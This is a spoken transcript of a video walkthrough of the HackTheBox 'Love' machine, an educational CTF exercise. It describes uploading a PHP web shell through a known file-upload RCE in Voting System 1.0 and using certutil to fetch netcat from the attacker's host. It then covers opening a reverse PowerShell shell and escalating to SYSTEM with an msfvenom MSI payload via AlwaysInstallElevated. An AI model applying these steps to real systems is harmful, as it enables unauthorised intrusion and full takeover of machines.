Welcome back, YouTube. It's really more welcome back for me. It has been a long hiatus since I've seen everyone last, and I've just been working on some other stuff that we're going to talk about later. But for right now, we're going to go after the newest retirement from HackTheBox, and that is Love. Love was put together by Pawn Meow. It's a very fun little box, not too hard. We're going to knock it out really fast. But that's because it relies on two things. One is CVEs. There is a CVE for the PHP voting system that we're going to look at. It's one of the websites. We'll go ahead and take a look at a couple other things. I'm going to use that exploit to just run right into the box. And then from there, we'll do a little bit of enumeration on the box and see if we can find some stuff. So we'll get that user, enumerate, and then we're going to find the AlwaysInstallElevated active. And that'll be an easy living off the land kind of tactic. And I'll show you lolboss, and we'll pull up the tactics, and everything's pretty simple. Very cut and paste. But there is a CVE for authenticated access, which can be given through going to one of the other websites and doing a SSRF. I didn't do any of that. I just bypassed it completely and went with the simple unauthenticated CVE shell. All right, let's get started. As always, we're going to do an Nmap, so we'll do an Nmap, and this box is going to be at 10, 10, 10, 239, and I'm just going to run a basic scan for right now to try and get some information, ports, and that kind of stuff. Right here you see we have port 80, which is HTTP. You've got 135, 139, 443, 445. There's some Microsoft Service ports in there, as well as 3306 for SQL and 5000. We don't know too much about 5000, so let's go ahead and just do a more specific scan. We're going to do 80 and 5000, and we'll do all scripts and all versions. With that, we hope to get a little bit of information about the website and maybe find out what this port 5000 is. In this case, it's going to be an HTTP server. To really knock this out of the park, we're going to see that port 80 is it's available for OpenSSL, so it can redirect. It is a voting system using PHP, which is kind of weird. And then this other one is 403 forbidden, but it's saying in the service info that the host is www.love.htb. So it gets us a virtual host that we might want to go after in this case. Let's take a look at port 80. We'll just bring up our web browser here. Put in 10, 10, 10, 239. So it's going to bring us right to the voting system. There's not a whole lot of information about this one. You're going to see it says sign in. You can say admin, admin. You can say that all day long, all you want. It does say cannot find voter with the ID. You can say A, still can't find voter. We'll go ahead and run a quick Gobuster. So just do a Gobuster dir. And our U is going to be 10, 10, 10, 239. It goes straight for that page. There we go. And then let's use word list opt. I got my sec lists in here. Discovery, web content, RAF large. Yeah, words.txt. We'll do 150 threads, and let's limit our status codes to 200, 301, or 302. 301 and 302. Pretty much anything successful. And let it go for right now. With that, you're going to see a couple things come up. One of the most popular ones is there's an admin. So /admin. It's going to come up in different camel case and uppercase, lowercase, things like that. You've got a folder called images, plugins. Let's see what happens when we go to some of these folders. So we'll come back over here and we will go to admin. We need to kill this because it's going to, yeah, it's going to give us some issues. All right, there we go. Simultaneous connections. So we come here, it looks about the same, but this is reading as an admin page. So if we come in here and we say admin, admin, it's going to say incorrect password. If I say parity admin, Now it's going to say cannot find account with a username. So it has a minor flaw here, which allows you to do username authentication, but it verifies that there is a user named admin. So for right now, it's a little bit of information. Let's go ahead and take a look at another one here, which is images. Images is kind of interesting. So when we look inside of images, you're going to see there's a Facebook profile, index JPEG, profile JPEG. There's nothing too serious right now, but it is giving us some clues and some information. We're going to be able to see some of these folders. The admin's a very good one, but I really don't have a lot to go off of. But knowing that it kind of reads voting system using PHP, it's just a very, very strange thing. We'll take a look at the source, see if it says anything. Same kind of thing. It's not giving us a lot of hints. So this is where there's kind of two roads diverge. There are exploits available. One is authenticated and one is unauthenticated. I happened to just go after this before I had figured out how to do the authenticated part. So we're just going to go after the unauth. I know that they kind of built in the ability to check for authenticated by getting a password from a different file. We're just going to go ahead and try this out. So exploit voting system PHP. Oops, that's not what I wanted. That's okay, I found it. Voting system 1.0, and then you're going to see here it's an RCE unauthenticated, and then there's an unauthenticated SQL injection. And if you come back down, there's an authenticated bypass. There's also an authenticated RCE, but we're going to go ahead and just go with this one. Super simple. It's going to kind of walk you through a little bit. It's going to say you should have the ability to do unauthenticated file upload using this website. So admin, which we know we have admin, and then candidates_add.php, and then your uploads will be stored to images, and we've already seen that we can see the images folder. So it'll be uploaded here. And it's just showing you the vulnerable code that is in the system. And then down here, it gives you the payload. And the payload is just one kind of web input. So I'm going to do something really simple here, which is I'm going to go to admin. If you look at this, it says that the refer was admin candidates.php. So I'll just go ahead and say that. So admin candidates.php, go to that, don't have access, because we're unauthenticated. Let's go ahead and open up Burp. Come down to the candidates, and I will send that over to my repeater. So Control R sends it to a repeater. Control Shift R takes me to that tab. I am just going to come in here, select all, paste right on top of it. Now, I'm not even going to lie. I've run into an issue so many times where that's what it looks like. In order for it to work, you have to have the additional empty line, just like every other normal HTTP formatted file, formatted request. So it's opposed to admin candidates. It's going to be looking for 192.168.1.1. That doesn't exist. So in here, I'm just going to drop in 10.10.10.239. And then I'll go ahead and copy this because there's 3 spots we're going to need to put this in. The other one being origin. We'll just paste that in. And then right in here in the refer, paste it in one more time. And I'm going to show you the code real quick. It is very simple. PHP echo execute. So it's going to send an execute system call with who am I. We'll go ahead and send that. When you send that, you're going to get a bunch of errors back. Notice undefined index admin, undefined index first name, last name, position, platform. All these things came back undefined. If you come over to this, you're going to see that it's looking for first name, last name, position, platform, photo with name. This is the one thing that we uploaded. Everything else came back with errors because we didn't set them. We could have set them to get rid of the errors. Don't really care. Not important. It's going to try and say insert into candidates all of this information, and that's where your error is coming from, is because it's not getting that information. But it went ahead and it still moved the uploaded file from the temporary spot into the images file name. So if we come back over here to images, let's just do a quick refresh. There's now a shell.php, which if you look in this original request, it does say shell.php. So not too bad. We'll go ahead and click on shell.php, and you're going to see the username, or in this case the who am I, is going to be box, the host name which is love, and the username which is phoebe. So we've got the basic shell down. I always like to run a little bit different game. If you ever get the ability to do an execute or system call in PHP, it's always great to just do an underscore get. We'll do square brackets and go ahead and just say cmd. You can say anything you want, but this is going to have it look for a input in the parameter of command and then use that to be your executed function. So if I send this again, it's going to upload another one called shell2. So we can always come back here, refresh. If I go to shell2, not going to work because it has no input, it has no command. I could have set it with a default and then overwritten it, that way it would always work, but I don't mind. Here we're just going to do a question mark and then cmd equals hostname. We'll just ask for a hostname. Hostname is love. I can come back in here and I can say, who am I? Okay, it's Phoebe. What happens if I say ls? I don't get anything. Why don't I get anything? Well, why don't I get anything? If you remember from way up here when we did the enumeration on the box, you had a bunch of Microsoft services, which means this is not a Linux box. It sounds so stupid, so simple, but that's the case. If I say dir, it does do a directory search. However, I only get the last line. So we're missing a lot of that output. So there's a couple ways to get the information. The best way is to get yourself a shell. Shells are a little bit trickier. In Windows, you're going to need some other functions. But for this one, I want to show you how to upload a copy of like Netcat. So you can come in here and you can do a PowerShell IEX, all that other stuff. Another way to do it is certutil. So if I do a search for certutil lolboss, we're going to get this page. Lolboss is living off the land, and it allows you to do things with already installed system files. So in this case, certutil is available. It's a great download tool. It's a great download tool. And this is all it takes is telling it to do a URL cache, say split, and then your file is going to be pulled from this file and then put into this file. So we'll go ahead and copy this one, and we're gonna bring it over here to shell2, and I'll do it right here on the command line. So we're gonna say certutil, and then this is gonna be us. So it's gonna be 10.10.14.12/nc.exe, and I'll just make this nc.exe. Okay. We got to make sure that we open up a web server. So sudo python 3. Let's do python 3. So I can do a tac m http.server80. Put in the password, and we are now sharing from 80. But this isn't the folder I wanted it in, so let's go ahead and say cd var.html, and we'll do it right there. Perfect. So now we come back over here. When we hit this, you're going to see it working, and it does come back and it says URL cache command completed successfully. If you come back over here, you're going to see that 10.10.10.239 did pull down nc.exe. Well, that's a good start. Let's see if we can use it. So let's do nc.exe 10.10.14.12. We're going to do it on port 9999, and then I'm going to have it run an instance of PowerShell. To make this function, we'll go ahead and open a new one and just say nc nvlp. We're going to listen on port 9999, and that's it. If we come back over to this window and run that command, we are going to get our reverse shell. So all of that is a way to get around some of the other mechanisms that the box developer had found to try and do this. We're just going to go ahead and take advantage of the RCE, unauthenticated. And now if I say, who am I? We're going to see we are love Phoebe. We're going to go ahead and go to C users, Phoebe desktop. Maybe. It seems to have hung. There it goes. Okay. So we're able to see that there is a user.txt. So we will just type user.txt. And there's our user.txt, and we are done. So we've got that. We were able to get the user. Very, very simple. It's just understanding what system you're looking at, the little amount of enumeration we had, and going back and using our knowledge of HackTheBox CTFs to go find very simple exploits. Could be way worse if this wasn't quite as out there. It wasn't quite as public. All right, that brings us to the next step, which is trying to do a little bit of privilege escalation enumeration. I have some information. I'm going to go ahead and use WinPEAS. And for me, the best way to get there is I'm going to go back. Oh, and it won't let me do it. Okay, so we'll certutil, and then I'll just do WinPEAS.exe, and we'll put it in as WinPEAS, all lowercase, just to be easier. And we'll go ahead and download that. Looks like it downloaded successfully. So over here, we need to go to C, XAMPP, cd htdocs, cd ors. Now we look in here, we can go into images, and there's my WinPEAS right there. All right. Let's run WinPEAS and see what's available. There's going to be a ton of things available. I'm just going to make this a little bit smaller so we can read it all on one page. As always, look for those red indicators to look for privilege, escalation, misconfigurations, things like that. And this one kind of sticks out. We see that, yes, this is a virtual machine, no big deal. Computer name is love. Those reds don't really stick out as anything weird. Console, Phoebe. Yeah. Down here you start to see they don't have LSA protection. They don't have credential guard. This is good. It's looking good for us. We're going to see that the local account token filter policy is set to 1. Any local account can be used for lateral movement. No big deal. I'm not so much worried about this. I did look at this history file, and it is boring. There's nothing valuable added into it. So we'll just go ahead and skip that for right now. It does say for the drives that authenticated users can create directories, append data, things like that. And then down here, AlwaysInstallElevated is set to 1. Now you can click on this little book hat trick thing and open that link. And they do a really good explanation of what it is. If these two registers are enabled, then users of any privilege can install anything that's a star.msi as NT system authority, and then when it launches, you're going to be able to do it. There is a interpreter session available so that you can just use a interpreter. You can use a power-up, which is part of some PowerShell scripting to allow you to do that as well. MSI wrapper, MSI installation. There's a couple different ways of going about it. But my favorite really, if you just come in here and you say privesc AlwaysInstallElevated. It's pretty close. It's close enough spelling. This DMCX Blue has a really good write-up where it just explains these are the hand commands that you would do if you were to try and see. But in this case, we get this information from WinPEAS. Kind of gives you the same kind of information. And then it has an msfvenom payload. We will copy the msfvenom payload. and bring it to this window. All right. We'll do it right here and just paste it in, and then change our IP. So 10.10.14.12. I'm gonna make this 888. We used 4 9s, we're gonna use 4 8s. It's just gonna set up a reverse TCP shell, x64 formatting. It's gonna make it this file. I'll go ahead and call this parity, just so I know that's my file. So parity.msi. We'll go ahead and run that. After it's run, I'm going to drop it back into my usual place. So I'll do a sudo copy parity, and then I'll just say var www.html. And it's now sitting in my directory. Over here, I'm still running my server. So if I come back here, I can do it this way. On my shell, we'll just say I want to download a different file. So in this case, it's going to be parity.msi, parity.msi. And we get the success. If we come over here, we're going to see that it did download. And then we're sitting in here still. So if I say ls, we're going to see that there is a parity MSI. So all this is set up. The only thing that we need to do is set up another netcat to catch. So nc nvlp all 8s. Come in here and we just say parity.msi. You're see that it runs, and come right over here. Who am I? I am NT Authority System. I will tell you right now, from my research and exposure to the exploit that's available on the MSF framework, it does say that it's going to take a couple times. Sometimes it doesn't work every shot. Same thing happens here. If you try to run it, it does not always work. Sometimes it just helps to give it a bunch of tries, wait a couple minutes, give it a bunch of tries, and let it reset. But in this case, it ran first time, which is perfect. And that makes it really easy to just say cd users administrator and desktop. If I do an ls dr, I'm going to see that I got a root. So type root.txt, and we've got our root.txt. That is it, start to finish, super short. You're talking 20 minutes, and that's with explanations. You can fast run this in around 5 to 10. Super easy. There are a couple other tricks that you can find out there if you watch some of the other videos that explain the authenticated access, the ability to pull the SSRF. I'm not going to deal with that. Not worth your time. So that's it. That's this box. I do want to say I have been away for almost 2 months. I've been taking a break, regenerating myself, as well as doing some extra training. And one of the things that I've kind of reached out onto is reverse engineering. Reverse engineering is a major weakness for me. When I do CTFs, it's just, it holds me back. And so I'm going to go through a small, I don't know if I'd call it a special series, but I'm going to set up a different set of videos to cover some of my CTF or HackTheBox kind of reverse engineering challenges to show the process and the way that I've been going about things, learning how to use the debuggers, whether it's GDB, EDB. I started getting into a lot more IDA, a lot more Ghidra, and trying to learn how to break down some of these files and run through and understand what they're doing. I am not good at it, but everything, just like this video, everything is about getting better. So I'm going to share with you guys some of the lessons I've learned. Hopefully it'll help you kind of come up to speed. Yeah, I've taken a lot of classes to learn this stuff. I don't really care. I'm not sharing any secrets, so I just want to help you guys get better. I do want to throw a thanks out to Pon Meow. Thank you for the box. I hope everybody here liked this video. Please stick around. I'm going to have a lot more cool content, like I said, with reverse engineering when I am not dropping new boxes. All right, have a great week. I'll see you guys next time.